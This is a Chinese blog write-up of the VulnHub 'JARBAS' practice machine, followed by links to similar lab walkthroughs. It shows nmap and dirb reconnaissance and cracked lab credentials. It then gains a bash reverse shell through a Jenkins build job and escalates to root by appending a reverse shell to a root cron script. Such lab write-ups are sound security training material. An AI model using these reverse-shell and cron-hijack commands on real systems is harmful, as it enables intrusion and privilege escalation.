vulnhub靶场系列——JARBAS

最新推荐文章于 2024-11-27 05:59:34 发布
最新推荐文章于 2024-11-27 05:59:34 发布
阅读量232 收藏 1
点赞数
分类专栏: 靶场 文章标签: 笔记 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51175992/article/details/134241283
版权

情报收集

nmap 扫描

  1. 内网网段扫描
nmap -sS -Pn 192.168.190.0/24
  • -sS:SYN扫描,特点:安全、快
  • -Pn:绕过ping扫描
    在这里插入图片描述
    这里发现192.168.190.131开放了22、80、3306、8080这些比较敏感的端口,因此可以初步确定该IP是我们这次渗透的目标靶机
  1. 利用nmap进行深度扫描
nmap -O -sV -T 4 -p- 192.168.190.131
  • -O:扫描目标服务器的操作系统
  • -sV:扫描端口服务
  • -T:扫描速率
  • -p-:全端口扫描
    在这里插入图片描述
    这里进行深度扫描后没有发现更多的信息
  1. 利用nmap自带的漏扫功能进行初步漏洞探测
nmap --script=vuln -p 22,80,3306,8080 192.168.190.131

在这里插入图片描述
这里也没有发现任何可利用的漏洞,不过在8080端口处发现了一个robots.txt的文件,在后面进行敏感文件收集时可以利用

web信息收集

  1. 指纹信息收集
    访问80和8080端口
    在这里插入图片描述

指纹信息还是挺多的,得知这里用的Jenkins做的后台,于是百度查看是否有默认账号密码之类的,最后发现默认密码在后台服务器中加密存储,因此想直接利用账号以及密码登录是比较难的
利用直接扫描的robots.txt文件也看不到有用的信息
在这里插入图片描述
2. 目录扫描
利用kali中自带的dirb目录扫描工具进行扫描

dirb http://192.168.190.131/

在这里插入图片描述
目录扫描也没有可以利用的信息,这里有时候需要添加特定的后缀名进行指定扫描

dirb http://192.168.190.131/ -X .php,.html

在这里插入图片描述
这里有个access.html可以利用
在这里插入图片描述
很好这里网页的提示到加密,同时可以看到下面的数据具备md5的特征
解密后的结果:

tiago:italia99
trindade:marianna
eder:vipsu

利用这三个用户尝试登陆,最后发现eder可以正常登陆
在这里插入图片描述

反弹shell

在后台创建新建任务出发现一处可以进行远程命令执行的输入框,因此尝试输入反弹shell

/bin/bash -i >& /dev/tcp/192.168.190.128/4444 0>&1

在Kali中开启nc监听

nc -lvvp 4444

在这里插入图片描述
发现反弹shell成功

提权

  1. 这里可以sudo -l查看当前用户权限
    在这里插入图片描述
    发现没有可以利用的命令
  2. 查看计划任务
cat /etc/crontab

在这里插入图片描述
在其中发现了一条计划任务:root用户会每5分钟执行在/etc/scripts下的CleaningScript.sh,并且会将结果输出到/dev/null(垃圾桶)下
可以访问下该文件
在这里插入图片描述
发现文件下存在一个删除文件的命令,因为crontab下的文件一般是由root权限进行输入的,因此可以修改该文件内容为反弹shell来完成

echo "/bin/bash -i >& /dev/tcp/192.168.190.128/2222 0>&1" >> /etc/script/CleaningScript.sh

然后等待任务启动
在这里插入图片描述
在Kali中启动nc监听2222端口
在这里插入图片描述

总结

这个靶场难度不是很大,主要是在情报收集的过程中使用扫描工具时一开始没有扫到关键信息时,一定要考虑加入特定的参数进行更详细的扫描。在web渗透阶段主要就是看是否有可以利用的漏洞,尤其是命令执行漏洞可以结合反弹shell直接进入服务器,一般用户的权限比较低,就需要查询可以提权的命令来完成更高权限的控制。

Vulnhub内网渗透Jangow01靶场通关
qq_35664104的博客
03-08 1025
靶场下载地址。下载下来后是 .vmdk 格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此这个靶场整体来说都比较常规,除了反弹shell有些困难,需要学习一些知识。
小白渗透之旅——Jarbas靶场(急速版)
qq_52849046的博客
05-30 826
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战。容易被gangan
vulnhub靶场Jarbas
weixin_45653478的博客
07-06 657
发现主机IP地址为:192.168.1.16。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 3770
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 2061
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
Vulhub漏洞靶场搭建
Innocence_0的博客
09-20 1084
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 917
这次的靶机是vulnhub靶机:Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
渗透靶场Jarbas
m0_56190544的博客
07-09 678
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 486
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1389
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场 noob:1(菜鸟)
dj445566的博客
11-26 687
本文为vulnhub靶场系列noob:1(菜鸟)靶场的做题方法
WebDeveloper内网渗透流程(新手入门流程梳理)
qq_30889301的博客
03-12 1630
webdeveloper简单的主机渗透流程。
新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 2309
新手向】VulnHub靶场MONEYBOX:1 | 详细解析
[渗透测试学习靶机09] vulnhub靶场 BOREDHACKERBLOG_ CLOUD AV
weixin_47112073的博客
11-10 531
这个靶机的难度初级-中级左右,跟之前的靶机差不多类似,难度在于反弹的时候可能不太成功,要尝试几下,之后就是可执行文件那一块,看有的博主一个个去SSH爆破,这样比较慢,我是直接查看每一个用户下面是否有可执行文件,这样其实也是投机取巧,最好还是要一个个文件去查看,看有咩有敏感信息等。
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 1208
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 4193
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
红队笔记-2:JARBAS打靶流程,【一步教学,一步到位】
2401_84139697的博客
04-09 1046
1.主机发现和端口扫描:nmap扫描发现靶机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密码,组合账号密码登录后台成功。
vulnhub入门靶场
最新发布
m0_58481967的博客
11-27 825
Dns解析同时还涉及到缓存的问题,比如有的时候把host文件里的映射关系删掉了,但还是可以访问,这就涉及到缓存的问题,缓存是什么不多赘述,比如你把hosts的映射删了,但是浏览器里还有缓存,它看见你访问driftingblues.box,然后找到了之前你访问成功的缓存记录,就直接去访问之前host映射的ip地址从而加速域名解析过程。本地hosts文件是优先级最高的缓存。应该是目录文件,dirsearch目录扫描没有这个文件是因为目录扫描也是根据目录字典进行爆破的,对于目录未收录的文件,也是扫不出来的。
后端开发人员Jarbas Medeiros专注Java与Spring Boot学习旅程
资源摘要信息: "Jarbas Medeiros是一名后端开发人员,专注于使用Java和Spring Boot技术栈进行开发工作。他的职业背景可能涉及编写、测试和维护服务器端软件,以及对应用程序后端逻辑的开发和优化。作为一名技术求知...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值